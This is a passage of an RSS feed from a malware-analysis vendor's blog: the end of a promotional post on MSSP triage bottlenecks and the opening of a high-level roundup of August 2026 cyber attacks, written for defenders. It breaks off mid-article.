<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-1024x576.webp" alt="The sandbox automatically solves CAPTCHA challenges" class="wp-image-22965" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-1024x576.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-300x169.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-768x432.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-370x208.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-270x152.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg-740x416.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/automated-interactivity.jpg.webp 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The sandbox automatically solves CAPTCHA challenges</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">For phishing investigations, <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">In-Browser Data Inspection</a> adds visibility into what actually happens inside the page. Analysts can inspect rendered content, credential-harvesting forms, redirect chains, hidden elements, and changes made to the DOM after the page loads. This helps Tier 1 work with evidence that static URL checks can miss.  </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="620" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-1024x620.webp" alt="See all URL details, DOM changes, network requests, and IOCs in one place " class="wp-image-22966" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-1024x620.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-300x181.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-768x465.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-1536x929.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-370x224.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-270x163.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data-740x448.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/in-browser-data.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>See all URL details, DOM changes, network requests, and IOCs in one place</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">That stronger evidence can keep more cases from moving up the chain unnecessarily. In ANY.RUN’s <a href="https://any.run/cybersecurity-blog/healthcare-mssp-success-story/" target="_blank" rel="noreferrer noopener">healthcare MSSP case study</a>, the <strong>Tier 1 closure rate increased from 20% to 70%</strong>. TI Lookup enrichment also contributed to <strong>34% fewer false escalations</strong>, helping the team keep more routine work away from Tier 2.  </p>



<h2 class="wp-block-heading">Bottleneck #3: Manual Handoffs and Reporting Slow Down Response </h2>



<p class="wp-block-paragraph">Even when an investigation is complete, analysts still have to package what they found for the next person, another team, or the client. </p>



<p class="wp-block-paragraph">That often means pulling together IOCs, screenshots, behavioral evidence, <a href="https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/" target="_blank" rel="noreferrer noopener">MITRE ATT&amp;CK mappings</a>, verdicts, and recommended actions manually. If the handoff is incomplete, the next analyst may need to reopen the investigation, recheck evidence, or ask for more context before they can act. </p>



<p class="wp-block-paragraph">For MSSPs, that extra work adds time to every case. It also ties up both sides of the handoff: the analyst preparing the report and the analyst waiting to continue the response. </p>



<h3 class="wp-block-heading">Give the Next Analyst a Ready-to-Use Investigation </h3>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">Tier 1 Reports</a> turn completed sandbox investigations into structured reports that can be passed directly to Tier 2, response teams, or clients. </p>



<p class="wp-block-paragraph">The report brings together the investigation verdict, key IOCs, behavioral findings, MITRE ATT&amp;CK mapping, screenshots, and other evidence from the analysis. AI Summary and AI Recommendations are generated automatically, giving the next analyst a quick overview of what happened and suggested next steps without having to work through the raw investigation first. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-1024x574.png" alt="Tier 1 report with AI recommendations and summary" class="wp-image-22968" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-1024x574.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-768x431.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-1536x862.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-2048x1149.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-report-740x415.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tier 1 report</em> <em>with AI recommendations</em> and summary</figcaption></figure>
</div>


<p class="wp-block-paragraph">This matters most when escalation is unavoidable. Tier 2 can start with a well-formed investigation record instead of spending the first part of the case rebuilding context that Tier 1 has already collected. </p>



<p class="wp-block-paragraph">Faster handoffs cut duplicated work and keep analyst time focused on response instead of report assembly, helping MSSPs handle more cases without adding the same pressure to margins. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut the time lost in manual handoffs.</span> 
<br>
Move cases to response with the context already in place.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktomssp#contact-sales " rel="noopener" target="_blank">
Accelerate Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Bottleneck #4: Outdated Threat Data Adds to the Triage Queue </h2>



<p class="wp-block-paragraph">Threat infrastructure rarely stays still for long. Attackers rotate domains, IPs, and URLs, while new infrastructure can appear faster than traditional threat lists are updated. </p>



<p class="wp-block-paragraph">For an MSSP protecting multiple client environments, stale intelligence creates a wider problem than a missed indicator. Activity linked to emerging infrastructure may continue generating new cases across customers before detection systems recognize it for what it is. </p>



<p class="wp-block-paragraph">That leaves analysts reacting to threats later in the cycle, when more investigation work is already required. At scale, even a small gap in threat-data freshness can translate into a larger queue and more incidents competing for the same team. </p>



<h3 class="wp-block-heading">Bring Fresh Threat Intelligence into Detection </h3>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> continuously deliver newly observed malicious IPs, domains, and URLs extracted from real malware and phishing investigations. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1024x443.png" alt="TI Feeds used to enrich systems with fresh and trustworthy IOCs" class="wp-image-22970" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1024x443.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-300x130.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-768x332.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1536x664.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-2048x885.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-370x160.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-270x117.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-740x320.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds used to enrich systems with fresh and trustworthy IOCs</em></figcaption></figure>



<p class="wp-block-paragraph">The intelligence is built on activity seen across a large community of <strong>16K organizations and more than 700K security professionals</strong>, creating a continuous source of data on malicious infrastructure as it appears. </p>



<p class="wp-block-paragraph">Feeds can be brought into an MSSP’s existing security stack, allowing current indicators to support detection across client environments before every new piece of infrastructure becomes another investigation. </p>



<p class="wp-block-paragraph">Keeping detection closer to what attackers are using now helps stop the triage queue from growing with threats that could have been recognized earlier. </p>



<h2 class="wp-block-heading">Bottleneck #5: Disconnected Tools Add Friction to Every Response </h2>



<p class="wp-block-paragraph">MSSP workflows rarely happen in one platform. Analysts may investigate a file or URL in one tool, manage alerts in a SIEM, enrich cases in a TIP, and coordinate response through a SOAR or ticketing system. </p>



<p class="wp-block-paragraph">When those systems are disconnected, investigation results have to be moved manually. IOCs get copied from one platform to another, case context gets rewritten, and analysts spend time making sure the same evidence exists everywhere it needs to. </p>



<p class="wp-block-paragraph">That friction grows with every additional client environment an MSSP supports. </p>



<h3 class="wp-block-heading">Connect ANY.RUN Directly to the Existing Security Stack </h3>



<p class="wp-block-paragraph">ANY.RUN integrations let MSSPs bring <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Sandbox analysis</a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a> into the tools they already use instead of keeping threat analysis as a separate step. </p>



<p class="wp-block-paragraph">Depending on the platform, integrations can send suspicious files or URLs to the Sandbox for analysis, enrich alerts with threat intelligence, pass fresh IOCs into detection workflows, or return investigation results to the systems where analysts already manage cases and response. </p>



<p class="wp-block-paragraph">ANY.RUN supports <a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">ready-made integrations</a> with SIEM, SOAR, TIP, XDR, and other security platforms, alongside <strong>API/SDK and STIX/TAXII</strong> options for custom workflows. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="511" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-1024x511.png" alt="Connect ANY.RUN directly to the existing security stack " class="wp-image-22971" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-1024x511.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-300x150.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-768x383.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-1536x766.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-2048x1022.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-370x185.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-270x135.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/integrations-740x369.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Connect ANY.RUN directly to the existing security stack </em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The practical difference is that analysts don’t have to jump out of their existing process every time they need ANY.RUN data. Investigation and threat intelligence can become part of the workflow already running across client environments. </p>



<p class="wp-block-paragraph">Less copying, fewer context switches, and fewer disconnected steps help cases move from alert to investigation and response faster, without adding another manual process for every customer. </p>



<h2 class="wp-block-heading">See the Margin Impact of Faster Triage &amp; Response </h2>



<p class="wp-block-paragraph">The value of faster triage and response shows up in how much work the same team can absorb. Fewer routine checks, fewer escalations, and shorter investigations reduce the amount of analyst time tied to each case. </p>



<p class="wp-block-paragraph">With ANY.RUN, MSSPs can achieve: </p>



<ul class="wp-block-list">
<li><strong>Up to 20% lower Tier 1 workload, </strong>freeing frontline capacity for more investigations. </li>



<li><strong>30% fewer Tier 1 → Tier 2 escalations, </strong>keeping higher-cost analyst time focused on complex cases. </li>



<li><strong>Up to 21 minutes lower MTTR per case, </strong>shortening the time each incident stays in the workflow. </li>



<li><strong>Up to 3× higher SOC efficiency,</strong> giving teams more room to support growing client workloads. </li>
</ul>



<p class="wp-block-paragraph">Together, these gains help MSSPs take on more work without letting analyst effort and operational costs grow at the same pace. That creates more room to scale while keeping margins under control. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut Tier 1 workload by up to 20%.</span> 
<br>
Free up analyst capacity and take pressure off MSSP margins.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktomssp#contact-sales " rel="noopener" target="_blank">
Improve MSSP Efficiency</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions used by 16,000+ organizations and 700,000+ security professionals worldwide. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps SOC teams and MSSPs investigate suspicious files, URLs, phishing pages, and malware while observing attack behavior in real time. Analysts can inspect processes, network activity, browser behavior, persistence, credential access, and other activity to reach faster, more confident verdicts. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> turns data from real-world sandbox investigations into actionable context for enrichment, detection, threat hunting, and response. Teams can uncover related infrastructure, investigate indicators, and bring fresh threat data into existing security workflows. </p>



<p class="wp-block-paragraph">ANY.RUN is also <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting its commitment to strong security controls and customer data protection. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/">Triage &amp; Response Bottlenecks Eating into MSSP Margins: How to Remove the Friction</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Major Cyber Attacks in August 2026: US and EU Businesses Hit by Session Hijacking, Remote Access, and Insider Risk</title>
		<link>https://any.run/cybersecurity-blog/major-cyber-attacks-august-2026/</link>
					<comments>https://any.run/cybersecurity-blog/major-cyber-attacks-august-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 01 Sep 2026 06:53:30 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22928</guid>

					<description><![CDATA[<p>August’s attacks showed how quickly trusted business activity can turn into risk. Across the US and Europe, attackers abused Microsoft 365 sessions, legitimate remote-management tools, business-themed files, and even hiring processes to reach corporate systems. The result was a mix of account takeover, persistent attacker control, credential exposure, and insider risk that often looked legitimate [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/major-cyber-attacks-august-2026/">Major Cyber Attacks in August 2026: US and EU Businesses Hit by Session Hijacking, Remote Access, and Insider Risk</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">August’s attacks showed how quickly trusted business activity can turn into risk. Across the US and Europe, attackers abused Microsoft 365 sessions, legitimate remote-management tools, business-themed files, and even hiring processes to reach corporate systems.</p>



<p class="wp-block-paragraph">The result was a mix of account takeover, persistent attacker control, credential exposure, and insider risk that often looked legitimate at first.</p>



<p class="wp-block-paragraph">Here’s what August’s biggest attacks reveal about where enterprise defenses are under pressure.</p>



<h2 class="wp-block-heading">What August’s Attacks Revealed About Enterprise Risk </h2>



<p class="wp-block-paragraph">Taken together, August’s incidents point to a broader shift in enterprise risk. Attackers are increasingly targeting the points where organizations already place trust: identities, administrative tools, authentication flows, and employees.</p>



<p class="wp-block-paragraph"><strong>Trusted tools created wider business exposure:</strong> Unauthorized RMM software and remote-control malware could give attackers control over credentials, files, and internal systems while blending into normal administration.</p>



<p class="wp-block-paragraph"><strong>Identity compromise threatened core workflows:</strong> Mirage2FA and 3DBlast targeted Microsoft 365 sessions, OAuth, device-code authentication, and MFA flows, putting email, cloud files, supplier communication, and finance processes at risk.</p>



<p class="wp-block-paragraph"><strong>MFA did not always end the attack:</strong> Stolen sessions could remain valid after authentication, meaning password resets alone might not remove the attacker from the account.</p>



<p class="wp-block-paragraph"><strong>Remote hiring became a security concern:</strong> The Famous Chollima investigation showed how false identities could pass recruitment checks and receive legitimate permissions across source code repositories and internal systems, with exposure extending to intellectual property.</p>



<p class="wp-block-paragraph"><strong>Changing infrastructure increased SOC workload:</strong> Several campaigns rotated domains, phishing flows, hosting, and remote-access tools, making single-IOC blocking less effective.</p>



<p class="wp-block-paragraph"><strong>Limited context could lead to incomplete containment:</strong> A legitimate app, successful login, or familiar document may reveal only one part of the incident. Teams need enough context to understand what was compromised and how far the exposure extends.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce the business impact</span> of delayed threat detection.
<br>
Contain threats before they disrupt critical operations.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-august-2026&#038;utm_term=010926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Enterprise Defense</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Who Attackers Targeted in August </h2>



<p class="wp-block-paragraph">August’s threat activity showed a strong focus on US organizations, cloud account users, and businesses relying on remote access and remote hiring. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-369"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="6"
           data-wpID="369"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Target Group                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Campaigns and Observed Focus                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        US organizations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Mirage2FA had its strongest victim concentration in the US, the RMM campaign was US-first, and 3DBlast was also observed in the country.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft 365 and cloud users                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Mirage2FA and 3DBlast targeted login flows, sessions, OAuth, device-code authentication, and MFA.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Technology, manufacturing, and education                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        These sectors appeared prominently across Mirage2FA and RMM campaign data.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Organizations hiring remote technical staff                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Famous Chollima showed how false identities could gain legitimate access to code, systems, and intellectual property.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Employees handling business files                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        SnakeBiteAgent and the RMM campaign used business-themed documents and archives as paths to remote access.                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-369'>
table#wpdtSimpleTable-369{ table-layout: fixed !important; }
table#wpdtSimpleTable-369 td, table.wpdtSimpleTable369 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">1. A US-First RMM Campaign Turned Fake Business Documents into Remote Access Across 46 Countries</h2>



<p class="wp-block-paragraph">Research published by ANY.RUN in August exposed a phishing campaign spanning <strong>46 countries, with 45% of observed activity associated with the United States</strong>. Attackers used tax documents, Social Security notices, invoices, Adobe PDFs, VAT notices, and shipping communications to convince victims to install legitimate remote management software. </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/us-campaign-malware-analysis/" target="_blank" rel="noreferrer noopener">Check detailed breakdown</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="773" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-1024x773.webp" alt="RMM campaign targets US" class="wp-image-22930" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-1024x773.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-300x226.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-768x579.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-1536x1159.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-370x279.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-270x204.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-740x558.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png-80x60.webp 80w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Vercel_Campaign_in-Brief-2048x1545.png.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>US-first RMM campaign overview based on ANY.RUN research</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">The campaign abused signed RMM tools including GoTo Resolve, LogMeIn Rescue, ScreenConnect, ConnectWise, and ITarian to establish hands-on remote access. Because these applications are also used for legitimate IT administration, their activity can resemble normal remote administration and make malicious use harder to identify. </p>



<p class="wp-block-paragraph"><strong>Remote-access risk to reduce:</strong> Security teams should be able to identify unexpected RMM installations regardless of the product used. Since the campaign changes domains, lures, and remote-access tools, blocking one URL or application is unlikely to stop the wider operation. ANY.RUN helps expose the full delivery chain and connect recurring campaign patterns across changing infrastructure. </p>



<h2 class="wp-block-heading">2. Hiring Lazarus APT’s IT Workers in a Fake DeFi Startup Exposed a Different Kind of Insider Threat </h2>



<p class="wp-block-paragraph">A joint investigation by BCA LTD, NorthScan, and ANY.RUN followed suspected Famous Chollima operatives beyond the interview stage by hiring them into a fake DeFi startup. After onboarding, the workers were given what they believed were company virtual desktops, while in reality they were operating inside specially prepared <strong>ANY.RUN sandbox environments</strong> that recorded their activity. </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/" target="_blank" rel="noreferrer noopener">Check detailed breakdown</a> </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/" target="_blank" rel="noreferrer noopener">Discover detection IOCs and tactics for corporate SOCs</a> </p>


<div class="wp-block-image">
